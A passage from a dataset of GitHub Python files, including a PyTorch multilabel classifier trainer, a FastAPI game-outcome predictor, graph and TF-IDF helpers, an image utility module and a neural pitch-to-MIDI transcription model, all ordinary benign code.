\n","repo_name":"davidlhoumaud/Malokal","sub_path":"src/glade2script.3.0.2/g2sPluginMplayer/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40238228569","text":"import importlib\nimport logging\n\n\ndef import_target(target_expression: str):\n \"\"\"依据expression获取对象\"\"\"\n components = target_expression.split('.')\n\n for idx in range(len(components)):\n package_path = \".\".join(components[:len(components) - idx])\n\n try:\n mod = importlib.import_module(package_path)\n except ModuleNotFoundError:\n continue\n else:\n\n rest_components = components[len(components) - idx:]\n obj = mod\n for com in rest_components:\n obj = getattr(obj, com)\n return obj\n raise ValueError(f'\"{target_expression}\" is invalid expression!')\n","repo_name":"Tasse00/fass-aop","sub_path":"aop/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1010509929","text":"import logging\nimport sys\nfrom pathlib import Path\nimport PIL\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport wandb\nfrom torch import optim\nfrom torch.utils.data import DataLoader, random_split\nfrom tqdm import tqdm\nimport random\nimport numpy as np\nimport warnings\nfrom sklearn.metrics import average_precision_score, accuracy_score, balanced_accuracy_score\n\nwarnings.filterwarnings(\"ignore\")\nimport pdb\n\n\ndef train_multilabel_classifier(args,net, train_loader, val_loader, test_loader,\n epochs: int = 100,\n batch_size: int = 16,\n learning_rate: float = 0.01,\n save_checkpoint: bool = True, wandb_log = None, split = 1):\n\n\n dir_checkpoint = Path('./checkpoints/')\n scale = tuple(float(i) for i in args.scale.split(\",\"))\n if min(scale) == 0:\n scale = None\n\n best_val_mAP = 0.0\n\n \n # 4. Set up the optimizer, the loss, the learning rate scheduler \n optimizer = optim.Adam(net.parameters(), lr=learning_rate, weight_decay=5e-4)\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=epochs)\n \n criterion = nn.BCEWithLogitsLoss()\n global_step = 0\n \n\n # 5. Begin training\n for epoch in range(1, epochs+1):\n net.train()\n epoch_loss = 0\n with tqdm(total=len(train_loader)*args.batch_size, desc=f'Epoch {epoch}/{epochs}', unit='img') as pbar:\n for images, labels, aux in train_loader:\n \n images = images.to(device=args.device, dtype=torch.float32)\n labels = labels.to(device=args.device, dtype=torch.double)\n #pdb.set_trace()\n outputs = net(images)\n optimizer.zero_grad()\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n outputs = torch.sigmoid(outputs) \n \n epoch_loss += loss.item()\n pbar.update(images.shape[0])\n global_step += 1\n wandb.log({\n 'train loss': loss.item(),\n 'step': global_step,\n 'epoch': epoch\n })\n pbar.set_postfix(**{'loss (batch)': loss.item()})\n\n ### Evaluation round\n val_mAP = evaluate(net,val_loader, args.device)\n scheduler.step()\n\n logging.info('Validation mAP: {}'.format(val_mAP))\n wandb_log.log({\n 'learning rate': optimizer.param_groups[0]['lr'],\n 'validation mAP': val_mAP,\n 'step': global_step,\n 'epoch': epoch\n }) \n\n if best_val_mAP < val_mAP:\n best_val_mAP = val_mAP\n if save_checkpoint:\n Path(str(dir_checkpoint)+'/'+args.expt).mkdir(parents=True, exist_ok=True)\n torch.save(net.state_dict(), str(dir_checkpoint)+'/'+args.expt + '/'+ 'checkpoint'+str(split)+'.pth')\n logging.info(f'Checkpoint {epoch} saved!')\n \n\n net.load_state_dict(torch.load(str(dir_checkpoint)+'/'+args.expt + '/'+ 'checkpoint'+str(split)+'.pth'))\n test_mAP = evaluate(net,test_loader, args.device)\n wandb_log.log({'test mAP': test_mAP})\n \n\n\ndef evaluate(net, dataloader, device):\n net.eval()\n num_val_batches = len(dataloader)\n mAP = 0.0\n all_targets = []\n all_predictions = []\n\n # iterate over the validation set\n for image, labels, aux in tqdm(dataloader, total=num_val_batches, desc='Validation round', unit='batch', leave=False):\n \n # move images and labels to correct device and type\n image = image.to(device=device, dtype=torch.float32)\n labels = labels.to(device=device, dtype=torch.double)\n \n with torch.no_grad():\n outputs = net(image)\n outputs = torch.sigmoid(outputs)\n\n all_targets.extend(labels.detach().cpu().numpy())\n all_predictions.extend(outputs.detach().cpu().numpy()) \n\n\n all_predictions = np.array(all_predictions)\n all_targets = np.array(all_targets) \n mAP = average_precision_score(all_targets, all_predictions)\n\n net.train()\n return mAP\n","repo_name":"Bidur-Khanal/MVAAL-medical-images","sub_path":"multi_label_classification_task_solver.py","file_name":"multi_label_classification_task_solver.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"35226962837","text":"import pandas as pd\nimport requests\n\nfrom fastapi import FastAPI\nimport joblib\nimport uvicorn\n\n\n#Declaring the FastApi instance\napp = FastAPI()\nurl = 'https://ddragon.leagueoflegends.com/cdn/12.3.1/data/en_US/champion.json'\nresp = requests.get(url=url)\ndata = resp.json()\n\n\ndef get_champion_id(name, data):\n champion_info = pd.DataFrame(data['data'])\n return int(champion_info.loc['key', name])\n\n\n@app.get(\"/\")\ndef index():\n return {'message': 'Welcome to Predicting LoL Winner!'}\n\n\n@app.get(\"/predict\")\ndef predict(top_blue, #Blue team top line champion\n jgl_blue, #Blue team jungler champion\n bot_blue, #Blue team bottom line champion\n mid_blue, #Blue team middle line champion\n sup_blue, #Blue team support champion\n top_red, #Red team top line champion\n jgl_red, #Red team jungler champion\n bot_red, #Red team bottom line champion\n mid_red, #Red team middle line champion\n sup_red): #Red team support champion\n\n #Predcitions are done in terms of the champion_id not the name\n ##Function get_champion_id searchs and returns the id of champions\n X = pd.DataFrame({\n 'TOP_x' : get_champion_id(top_blue, data),\n 'JGL_x' : get_champion_id(jgl_blue, data),\n 'BOT_x' : get_champion_id(bot_blue, data),\n 'MID_x' : get_champion_id(mid_blue, data),\n 'SUP_x' : get_champion_id(sup_blue, data),\n 'TOP_y' : get_champion_id(top_red, data),\n 'JGL_y' : get_champion_id(jgl_red, data),\n 'BOT_y' : get_champion_id(bot_red, data),\n 'MID_y' : get_champion_id(mid_red, data),\n 'SUP_y' : get_champion_id(sup_red, data)\n }, index=[0])\n\n #pipeline previously trained with the test data\n pipeline = joblib.load('model.joblib')\n\n #make prediction\n results = pipeline.predict(X)\n prediction = float(results[0])\n\n return dict(winner=prediction)\n","repo_name":"stephanyvargas/LoL_winner_predictor","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2810144060","text":"def ToGraph(edges):\n graph = {}\n for I,O in edges:\n if I not in graph:\n graph[I] = [O]\n else:\n graph[I].append(O)\n if O not in graph:\n graph[O] = [I]\n else:\n graph[O].append(I)\n return graph\n\ndef Bipartite(edges):\n graph = ToGraph(edges)\n Color = [-1 for _ in range(len(graph.keys())+1)]\n def CheckBipartate(graph,Node,Color,PrevColor):\n Color[Node] = PrevColor\n for i in graph[Node]:\n if(Color[i] == -1):\n if(CheckBipartate(graph,i,Color,1-PrevColor) == False):\n return False\n elif(Color[i] == PrevColor):\n return False\n return True\n for i in graph.keys():\n if(Color[i] == -1):\n PrevColor = 0\n if(CheckBipartate(graph,i,Color,PrevColor) == False):\n return False\n return True\n \n#edges = [[1,2],[2,3],[2,8],[3,4],[8,5],[4,5],[5,6],[6,7]]\n#edges = [[1,2],[2,3],[3,4],[4,5],[5,8],[2,7],[7,6],[6,5]]\n#edges = [[0,1],[1,2],[2,3],[3,0],[0,2]]\n#edges = [[0,1],[1,2],[2,3],[3,0]]\nedges = [[1,2],[1,3],[2,3]]\nprint(Bipartite(edges))\n","repo_name":"Sunilsai1066/Algorithms","sub_path":"Striver_Graph/Finding If Graph Is Bipartite Using DFS.py","file_name":"Finding If Graph Is Bipartite Using DFS.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2107672164","text":"import math\n\nTF_BINARY = 0\nTF_RAW_FREQ = 1\nTF_LOG_NORM = 2\nTF_DBL_NORM = 3\nTF_DBL_NORM_K = 4\n\nICF_UNARY = 0\nICF_INV_FREQ = 1\nICF_INV_FREQ_S = 2\nICF_INV_FREQ_MAX = 3\nICF_PROB_INV_FREQ = 4\n\n####\n# TF variants - From Wikipedia\n#####\n# binary\t{0,1}\n# raw frequency\t f_{t,d}\n# log normalization\t 1 + \\log f_{t,d}\n# double normalization 0.5\t0.5 + 0.5 \\frac { f_{t,d} }{\\max {f_{t,d}}} \n# double normalization K\tK + (1 - K) \\frac { f_{t,d} }{\\max {f_{t,d}}} \n\n\ndef calc_tf(n, max_n, opt, k):\n\t\n\tif(opt == TF_BINARY):\n\t\tif(n > 0):\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\t\n\telif(opt == TF_RAW_FREQ):\n\t\treturn n\n\t\n\telif(opt == TF_LOG_NORM):\n\t\treturn 1 + math.log(n)\n\n\telif(opt == TF_DBL_NORM):\n\t\treturn 0.5 + 0.5* (float(n)/float(max_n))\n\n\telif(opt == TF_DBL_NORM_K):\n\t\treturn k + (1-k)*(float(n)/float(max_n))\n\n\telse:\n\t\traise Exception(\"Invalid TF calculation option\")\n\t\treturn -1\n\n####\n# IDF variants - From Wikipedia\n#####\n# unary\t1\n# inverse frequency\t \\log \\frac {N} {n_t} \n# inverse frequency smooth\t \\log (1 + \\frac {N} {n_t}) \n# inverse frequency max\t \\log (1 + \\frac {\\max_t n_t} {n_t}) \n# probabilistic inverse frequency\t \\log \\frac {N - n_t} {n_t} \n\ndef calc_icf(n_t, max_n_t, N, opt):\n\n\tif(ICF_UNARY == opt):\n\t\treturn 1\n\n\telif(ICF_INV_FREQ == opt):\n\t\treturn math.log(float(N)/float(n_t))\n\n\telif(ICF_INV_FREQ_S == opt):\n\t\treturn math.log(1 + float(N)/float(n_t))\n\n\telif(ICF_INV_FREQ_MAX == opt):\n\t\treturn math.log(1 + float(max_n_t)/float(n_t))\n\n\telif(ICF_PROB_INV_FREQ == opt):\n\t\treturn math.log(float(N - n_t)/ float(n_t))\n\n\telse:\n\t\traise Exception(\"Invalid TF calculation option\")\n\t\treturn -1\n\n\n\n\n\n\n\n\n","repo_name":"chandrashekar-cv/NLP-project--WikiLine","sub_path":"train/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72418213208","text":"# -*- coding: utf-8 -*-\n\nimport platform, json, os, importlib, gzip\n\ndef installed_environment_detect():\n Major, Minor = [int(Num) for Num in platform.python_version().split(\".\")[0:2]]\n\n if Major < 3:\n warning_display(\"Please use deepcopy with minimum Python 3.7!\", \"util:env detect min py 3\")\n\n if Major == 3 and Minor < 7:\n warning_display(\"Tested with Python 3.7. Maybe it works with older versions.\", \"util:env detect, min 3.7\")\n\n# def module_import_\n\n# Real situation: PIL is available but ImageTk is not.\n# so module_available is not totally enough to successful import.\n# TESTED\ndef module_available(ModuleName, Msg):\n if not importlib.util.find_spec(ModuleName):\n warning_display(Msg, \"util:module_available\")\n return False\n return True\n\ndef os_detect(Prg):\n Os = Prg[\"Os\"] = platform.system() \n print(ui_msg(Prg, \"os_detect.detected\").format(Os))\n if Os != \"Linux\" and Os != \"Windows\":\n warning_display(\"Not supported Os detected: {:s}\".format(Os), \"util:os_detect\")\n if Os == \"Darwin\": \n warning_display(\"Theoretically DeepCopy can run on Mac if the necessary external commands are available, TODO in the future\", \"util:os darwin\")\n\ndef ui_msg_init(Prg):\n Txt = file_read_all(Prg, os.path.join(Prg[\"DirPrgParent\"], \"resources\", \"ui_messages.json\"))\n Prg[\"UiMessages\"] = json.loads(Txt)\n\n# MsgPath example: os_detect.detected\n# if we process an error message and later the program can be broken,\n# we print the message immediately\n# TESTED\ndef ui_msg(Prg, MsgPath, TestCase=False):\n\n # it can handle one path or list of paths\n if isinstance(MsgPath, list):\n Texts = list()\n for Path in MsgPath:\n Texts.append(ui_msg(Prg, Path, TestCase=TestCase))\n return Texts\n\n Container = Prg[\"UiMessages\"]\n for Key in MsgPath.split(\".\"):\n if Key in Container:\n Container = Container[Key]\n else:\n Msg = \"Ui message key is unknown in container: \" + Prg[\"UiLanguage\"] + \" - \" + MsgPath\n if not TestCase: # no messages from test execution\n warning_display(Msg, \"util:ui_msg, key is unknown\")\n return Msg\n\n # check: eng msg always has to be defined\n if \"eng\" not in Container:\n Msg = \"Ui message, default eng translation is missing: \" + MsgPath\n if not TestCase:\n warning_display(Msg, \"util:ui_msg, eng missing\")\n return Msg\n\n # here we get one lang block, for example: {\"eng\": \"menu\", \"hun\":\"menü\"}\n if Prg[\"UiLanguage\"] in Container:\n return Container[Prg[\"UiLanguage\"]]\n else:\n if \"eng\" in Container:\n if not TestCase:\n warning_display(\"Ui message is unknown: \" + Prg[\"UiLanguage\"] + \" - \" + MsgPath, \"util:only_eng_in_container\")\n return Container[\"eng\"]\n\n\ndef warning_display(Msg, Caller=\"TODO FIX THE CALLER if you call it only with one Param\"):\n print(\"Warning: \", Msg, \" (\"+Caller+\")\")\n\ndef error_display(Msg, Caller):\n MsgOut = \"Error: \" + str(Msg) +\" (\"+Caller+\")\"\n raise Exception(MsgOut)\n\ndef list_display(List, Title):\n if not List:\n return\n print(\"== {:s} ==\".format(Title))\n for L in List:\n print(L)\n\n# DOC: naive formatted dictionary display\ndef dict_with_lists_display_simple_data(Dict, Title=\"\", Prefix=\" \", NewLine=False):\n if NewLine: print(\"\")\n if Title: print(Title)\n\n KeyMaxLen = 0\n # find Max length in keys\n for Key in Dict:\n KeyLen = len(str(Key))\n if KeyLen > KeyMaxLen:\n KeyMaxLen = KeyLen\n\n for Key, Values in Dict.items():\n LengthInfo = \" \" + str(len(Values)) + \" elem -> \"\n print(\"{:s}{:>{Width}}{:>{WidthLenInfo}}{:s}\".format(Prefix, str(Key), LengthInfo, str(Values), WidthLenInfo=12, Width=KeyMaxLen))\n\ndef dict_delete_keys(Dict, KeysRemove):\n for Key in KeysRemove:\n # print(\" del:\", Key)\n del Dict[Key]\n##################################\n\n\n# TESTED\ndef file_read_all(Prg, Fname=\"\", Mode=\"r\"): # if you want read binary, write \"rb\"\n Content = \"\"\n if file_test(Prg, Fname, MsgErr=\"File doesn't exists: '\" + Fname + \"'\"):\n with open(Fname, Mode) as f:\n Content = f.read()\n return Content\n\ndef file_read_lines(Prg, Fname=\"\", ErrMsgNoFile=\"\", ErrExit=False, Strip=False):\n if isinstance(Fname, list):\n Files = Fname\n Out = list()\n for File in Files:\n Out.extend(file_read_lines(Prg, File, ErrMsgNoFile=ErrMsgNoFile, ErrExit=ErrExit, Strip=Strip))\n return Out\n\n if file_test(Prg, Fname):\n with open(Fname, 'r') as F:\n if Strip:\n return [L.strip() for L in F.readlines()]\n else:\n return F.readlines()\n\n elif ErrMsgNoFile:\n if ErrExit:\n error_display(ErrMsgNoFile, \"file_read_all, if ErrExit=True\")\n else:\n warning_display(ErrMsgNoFile, \"file_read_all, if ErrExit=False\")\n return list()\n\n# TESTED\ndef file_test(Prg, Fn=\"\", MsgErr=\"\", ErrExit=False, MsgOk=\"\"):\n Ret=True\n if not os.path.isfile(Fn):\n Ret=False\n if not MsgErr:\n MsgErr = ui_msg(Prg, \"file_operation.file_missing\").format(Fn)\n else:\n MsgErr += MsgErr + \"(\" + Fn + \")\"\n\n if ErrExit:\n error_display(MsgErr, \"util:file_test\")\n else:\n warning_display(MsgErr, \"util:file_test\")\n else:\n if MsgOk:\n print(MsgOk)\n return Ret\n\n\ndef file_append(Prg, Fname=\"\", Content=\"\",\n Mode=\"a\"): # you can append in binary mode, too\n file_write(Prg, Fname=Fname, Content=Content, Mode=Mode)\n\n\ndef file_write(Prg, Fname=\"\", Content=\"\", Mode=\"w\", Gzipped=False, CompressLevel=9):\n if not Fname:\n warning_display(\"file_write error: not fname\", \"util:file_write, not Fname\")\n return\n print(\"writing:\", Fname)\n # if we received a list of string, convert it to string:\n if isinstance(Content, list):\n Content = '\\n'.join(Content)\n\n if Gzipped:\n if not \"b\" in Mode:\n Mode = Mode + \"b\"\n OutputBytes = bytes(Content, 'utf-8')\n Content = gzip.compress(OutputBytes, CompressLevel)\n\n try:\n f = open(Fname, Mode)\n f.write(Content)\n f.close()\n return True\n except:\n warning_display(\"file_write error: \" + Fname, \"util:file_write, except\")\n return False\n\ndef dir_create_if_necessary(Path):\n if not os.path.isdir(Path):\n os.mkdir(Path)\n\n# Tested\ndef img_load_into_prg_structure__get_imgid(Prg, FilePathElems):\n FilePathImg = os.path.join(*FilePathElems)\n ImgId = img_generate_id_for_loaded_list(Prg, PreFix=\"thumbnail\", PostFix=FilePathImg)\n img_load_into_prg_structure(Prg, FilePathImg, ImgId)\n Img = Prg[\"ImagesLoaded\"][ImgId]\n return Img, ImgId\n\n# Tested\ndef img_load_into_prg_structure(Prg, FileSelectedPath,\n ImgId,\n PixelsPreview = None,\n PixelsPreviewImg = None,\n ImageTkPhotoImageThumbnail = None,\n ):\n file_test(Prg, FileSelectedPath, ErrExit=True)\n\n Pixels, PixelDataSize, ImgWidth, ImgHeight = img_load_pixels(Prg, FileSelectedPath) # RGB has 3 integers, RGBA has 4, Grayscale has 1 integer\n\n # example \"TextSelectCoords\" : [ one bubble can contain any coordinate pairs\n # [ [5,10], [256, 10], [256, 612], [5, 612] ]\n # ]\n TextSelectPreviewPixelsWidth = 0\n TextSelectPreviewPixelsHeight = 0\n if PixelsPreviewImg:\n TextSelectPreviewPixelsWidth = PixelsPreviewImg.size[0]\n TextSelectPreviewPixelsHeight = PixelsPreviewImg.size[1]\n\n Prg[\"ImagesLoaded\"][ImgId] = {\n \"Reference2avoidGarbageCollector\": ImageTkPhotoImageThumbnail,\n # TODO: use empty TextSelectCoords by default\n \"TextSelectCoords\": [ [[10, 10], [10, 50], [50, 50], [50, 10]] ], # here can be lists, with coordinate pairs,\n \"TextSelectPreviewPixels\": PixelsPreview,\n \"TextSelectPreviewPixelsWidth\": TextSelectPreviewPixelsWidth,\n \"TextSelectPreviewPixelsHeight\": TextSelectPreviewPixelsHeight,\n \"FilePathOriginal\": FileSelectedPath,\n \"Pixels\": Pixels,\n \"PixelDataSize\": PixelDataSize,\n \"Width\": ImgWidth,\n \"Height\": ImgHeight\n }\n\n# indirect tested only:\n# util.img_load_into_prg_structure__get_imgid(Prg, FilePathElems)\n# -> img_load_into_prg_structure(Prg, FilePathImg, ImgId)\n# -> img_load_pixels()\ndef img_load_pixels(Prg, ImgPath, Timer=False):\n try:\n from PIL import Image\n except ImportError:\n error_display(ui_msg(\"install.missing.module_pillow\"), \"util:mg_load_pixels, PIL import\")\n\n ImgOriginal = Image.open(ImgPath)\n ImgWidth, ImgHeight = ImgOriginal.size\n\n # detect once that it's RGB or RGBA (3 or 4 elements in the tuple)\n PixelSampleColorValue = ImgOriginal.getpixel((0, 0))\n # if it's a grayscale img, it't a simple int, not a tuple\n if isinstance(PixelSampleColorValue, int):\n PixelDataSize = 1\n else:\n PixelDataSize = len(PixelSampleColorValue) # RGB value has 3 elems, RGBA has 4\n print(\"Pixel Data size: \", PixelDataSize)\n\n Pixels = ImgOriginal.load()\n\n return Pixels, PixelDataSize, ImgWidth, ImgHeight\n\n# TESTED\ndef img_generate_id_for_loaded_list(Prg, PreFix=\"\", PostFix=\"\"):\n NumOfLoadedPics = len(Prg[\"ImagesLoaded\"].keys())\n if PreFix: PreFix += \"_\"\n if PostFix: PostFix = \"_\" + PostFix\n return \"{:s}{:d}{:s}\".format(PreFix, NumOfLoadedPics + 1, PostFix)\n\n# TESTED\ndef img_is_rgb(Img):\n Size = Img.get(\"PixelDataSize\", -1)\n if Size == 3:\n return True\n return False\n\n# TESTED\ndef img_is_grayscale(Img):\n Size = Img.get(\"PixelDataSize\", -1)\n if Size == 1:\n return True\n return False\n\n# TESTED, neighbour coord order:\n# CDE\n# B F\n# AHG\ndef coords_neighbour_points(Coord):\n X, Y = Coord\n return [\n (X - 1, Y + 1),\n (X - 1, Y ),\n (X - 1, Y - 1),\n (X, Y - 1),\n (X + 1, Y - 1),\n (X + 1, Y ),\n (X + 1, Y + 1),\n (X, Y + 1),\n ]\n\n# it's a very often used func.\n# I want to avoid extract values so I didn't receive\n# coords as a tuple.\n# TESTED\ndef coords_connect_fromA_toB_with_points(Ax, Ay, Bx, By):\n\n DeltaX = Bx - Ax\n DeltaY = By - Ay\n\n StepY = 1\n if Ay > By:\n StepY = -1\n\n StepX = 1\n if Ax > Bx:\n StepX = -1\n\n Points = list()\n # print(\"\\n>>>\", Ax, Ay, \", \", Bx, By)\n\n RangeX = range(Ax, Bx + StepX, StepX)\n RangeY = range(Ay, By + StepY, StepY)\n\n # simple case: only X is moving\n if DeltaY == 0:\n Y = Ay\n for X in RangeX:\n Points.append((X,Y))\n\n # simple case: only Y is moving\n elif DeltaX == 0:\n X = Ax\n for Y in RangeY:\n Points.append((X,Y))\n\n else: # X and Y is moving, not horizontal/vertical steps\n\n # if we move nearly vertically,\n # for example: connect_coords(2, 1, 1, 4)\n # then in vertical axis there are much more fine Y steps 1,2,3,4\n # then in horizontal axis where we can use these two X steps: 2,1\n # So the choosen step order depends on the absolute value of deltas\n\n if abs(DeltaX) >= abs(DeltaY):\n Y = Ay\n YchangePerUnit = float(DeltaY) / abs(DeltaX)\n\n Step = 0\n for X in RangeX:\n PointCalculated = (X, int(round(Y+YchangePerUnit*Step) ) )\n Points.append(PointCalculated)\n Step += 1\n\n else: ##### abs(DeltaX) < abs(DeltaY) #####\n X = Ax\n XchangePerUnit = float(DeltaX) / abs(DeltaY)\n\n Step = 0\n for Y in RangeY:\n PointCalculated = ( int(round(X+XchangePerUnit*Step)), Y )\n Points.append(PointCalculated)\n Step += 1\n\n return Points\n\n# find the middle of two coordinates\ndef coord_middle(CoordA, CoordB):\n XA, YA = CoordA\n XB, YB = CoordB\n return(int((XA+XB)/2), int((YA+YB)/2))\n\n# TESTED\ndef txt_multiline_insert_prefix(TextWithNewlines, Prefix=\">> \"):\n Formatted = list()\n for Line in TextWithNewlines.split(\"\\n\"):\n Formatted.append(Prefix + Line)\n return \"\\n\".join(Formatted)\n\n\n","repo_name":"BalazsNyiro/deepcopy","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":12397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9400953582","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nimport numpy as np\nimport librosa, math\nimport glob\nimport os.path\nimport mido\nimport time\nfrom mido import MidiFile\nfrom mido import MidiTrack\nfrom mido import Message\n\nclass Multiple_F0(nn.Module) :\n #-------------------------------------------------------------------------------------------\n def __init__(self, session_directory, data_directory, use_cpu=False) :\n super(Multiple_F0, self).__init__()\n \n #inclusive of both\n self.lowest_midi_note = 36\n self.highest_midi_note = 96\n \n self.input_size = 2048\n self.hop_size = self.input_size // 2\n self.hidden_size = 64#265\n self.output_size = self.highest_midi_note - self.lowest_midi_note + 1;\n \n self.layer_1 = torch.nn.Linear(self.input_size + self.output_size, self.hidden_size);\n self.activation_1 = torch.nn.ReLU()\n #self.activation_1 = torch.nn.Tanh()\n self.layer_2 = torch.nn.Linear(self.hidden_size, self.output_size);\n self.activation_2 = torch.nn.Sigmoid()\n \n #this helps these get saved and restored correctly.\n self.use_cpu = use_cpu\n self.sample_rate = 44100\n self.session_directory = session_directory\n self.data_directory = data_directory\n self.__saved_checkpoint_batch = nn.Parameter(torch.IntTensor([0]), requires_grad=False)\n self.__sample_rate = nn.Parameter(torch.FloatTensor([self.sample_rate]), requires_grad=False)\n self.model_save_prefix = \"model_\"\n \n # display num params\n self.num_params()\n\n #-------------------------------------------------------------------------------------------\n def save_checkpoint(self, num_batches):\n path = os.path.join(self.session_directory, self.model_save_prefix + str(num_batches).zfill(6) + \".checkpoint\")\n self.__saved_checkpoint_batch[0] = num_batches;\n torch.save(self.state_dict(), path);\n #old_checkpoints = glob.glob(os.path.join(self.session_directory, self.model_save_prefix) + \"*\");\n #for checkpoint in old_checkpoints:\n # if checkpoint != path:\n # os.remove(checkpoint);\n print(\"Saved \" + path + \" at batch \" + str(num_batches));\n \n #-------------------------------------------------------------------------------------------\n def restore_if_checkpoint_exists(self, session_directory) :\n saved_model = glob.glob(os.path.join(session_directory, self.model_save_prefix) + \"*.checkpoint\")\n if len(saved_model) > 0:\n saved_model = sorted(saved_model)[-1];\n #todo: can't I check whether the state was loaded successfully?\n model = None\n model = torch.load(saved_model, map_location=\"cpu\")\n \n #if torch.cuda.is_available():\n # model = torch.load(saved_model, map_location='gpu')\n #else:\n # model = torch.load(saved_model, map_location='cpu')\n\n self.load_state_dict(model)\n self.session_directory = session_directory\n #self.sample_rate = self.__sample_rate.item()\n print(\"Restoring checkpoint: {} pretrained with {} batches\".format(saved_model, self.__saved_checkpoint_batch[0]))\n else:\n print(\"Creating Session: \" + session_directory)\n\n #-------------------------------------------------------------------------------------------\n def get_saved_num_batches(self):\n return self.__saved_checkpoint_batch.item()\n\n #-------------------------------------------------------------------------------------------\n def calculate_audio_features(self, audio):\n n = len(audio)\n #apply hanning window\n audio = np.multiply(audio, np.hanning(n))\n \n #pad to length 2n\n audio = np.pad(audio, (0, n), 'constant', constant_values=(0, 0))\n \n #compute DFT\n spectra = np.fft.rfft(audio)\n \n #cancel noise\n for i in range(len(spectra)) :\n if abs(spectra[i]) < 0.0002 : #-74 dB\n spectra[i]= 0+0j\n \n #square it (dft of autocorrelation)\n conjuga = np.conjugate(spectra)\n spectra = np.multiply(spectra, conjuga)\n \n \n \n #spectra = np.real(spectra)\n #compute autocorrelation\n spectra = np.fft.irfft(spectra, 2*n)\n audio = spectra[:self.input_size]\n \n #dont normalize audio, tried it, made a lot of crap in the silent sectinos\n #normalize audio\n #max = audio[0]\n #if max > 0 :\n # audio = np.multiply(audio, 1/max)\n \n return audio\n \n \n #-------------------------------------------------------------------------------------------\n def get_active_MIDI_notes_in_time_range(self, midi, start_secs, end_secs):\n running_time = 0\n active_notes = []\n result = []\n \n for msg in midi:\n running_time += msg.time\n \n if running_time > end_secs:\n break;\n \n elif running_time < start_secs:\n if msg.type == 'note_on':\n active_notes.append(msg);\n if msg.type == 'note_off':\n for m in active_notes:\n if (m.note == msg.note) and (m.channel == msg.channel):\n active_notes.remove(m)\n \n else: #start_secs < running_secs < end_secs\n if msg.type == 'note_on':\n reattack = False\n for m in active_notes:\n if (m.note == msg.note) and (m.channel == msg.channel):\n reattack = True\n break;\n if not reattack:\n active_notes.append(msg)\n \n #if not msg.is_meta\n for m in active_notes:\n result.append(m.note);\n \n return result;\n\n #-------------------------------------------------------------------------------------------\n def output_notes_to_vector(self, notes):\n vector = np.zeros(self.output_size);\n\n for note in notes:\n while note > self.highest_midi_note:\n note -= 12\n while note < self.lowest_midi_note:\n note += 12\n #++output_array[note]\n vector[note-self.lowest_midi_note] = 1\n return vector\n\n #-------------------------------------------------------------------------------------------\n def get_random_training_example_from_file(self, audio_basename, is_training=True):\n training_folder = \"Training\" if is_training else \"Validation\"\n audio_path = os.path.join(self.data_directory, training_folder, \"Audio\", audio_basename)\n wav, sr = librosa.load(audio_path, sr=self.sample_rate, mono=True)\n length_in_samples = len(wav)\n if length_in_samples < (2*self.input_size):\n print(\"{} could not be loaded because it is too short.\".format(audio_filename))\n return None, None\n \n start_sample = np.random.randint(self.input_size, length_in_samples - self.input_size)\n audio = wav[start_sample : start_sample+self.input_size]\n audio = self.calculate_audio_features(audio)\n\n midi_basename = audio_basename[:-4] + \".mid\"\n midi_file = MidiFile(os.path.join(self.data_directory, training_folder, \"MIDI\", midi_basename))\n start_secs = start_sample / sr\n end_secs = (start_sample + self.input_size) / sr\n notes = self.get_active_MIDI_notes_in_time_range(midi_file, start_secs, end_secs)\n output_array = self.output_notes_to_vector(notes);\n \n #autoregressive_input\n prev_start_secs = (start_sample - self.hop_size) / sr\n prev_notes = self.get_active_MIDI_notes_in_time_range(midi_file, prev_start_secs, start_secs)\n prev_output_array = self.output_notes_to_vector(prev_notes);\n audio = np.concatenate((audio, prev_output_array))\n \n return audio, output_array\n\n #-------------------------------------------------------------------------------------------\n def get_random_training_batch(self, examples_per_batch, is_training=True):\n input_data = [];\n output_data = [];\n training_folder = \"Training\" if is_training else \"Validation\"\n wav_paths = glob.glob(os.path.join(self.data_directory, training_folder, \"Audio/*.wav\"))\n \n for i in range(examples_per_batch):\n wav_index = np.random.randint(0, len(wav_paths))\n basename = os.path.basename(wav_paths[wav_index])\n x, y = self.get_random_training_example_from_file(basename, is_training)\n input_data.append(x)\n output_data.append(y)\n\n return input_data, output_data\n \n #-------------------------------------------------------------------------------------------\n def num_params(self) :\n parameters = filter(lambda p: p.requires_grad, self.parameters())\n parameters = sum([np.prod(p.size()) for p in parameters]) / 1000000\n print('Trainable Parameters: %.3f million' % parameters)\n\n #-------------------------------------------------------------------------------------------\n def time_since(self, started) :\n elapsed = time.time() - started\n m = int(elapsed // 60)\n s = int(elapsed % 60)\n if m >= 60 :\n h = int(m // 60)\n m = m % 60\n return str(h) + \":\" + str(m) + \":\" + str(s).zfill(2)\n else :\n return str(m) + \":\" + str(s).zfill(2)\n \n #-------------------------------------------------------------------------------------------\n def forward(self, x) :\n hidden = self.activation_1(self.layer_1(x))\n #hidden_2 = self.activation_1_5(self.layer_1_5(hidden))\n output = self.activation_2(self.layer_2(hidden))\n return output\n\n #-------------------------------------------------------------------------------------------\n def do_forward_batch_and_get_loss(self, examples_per_batch, is_training):\n if 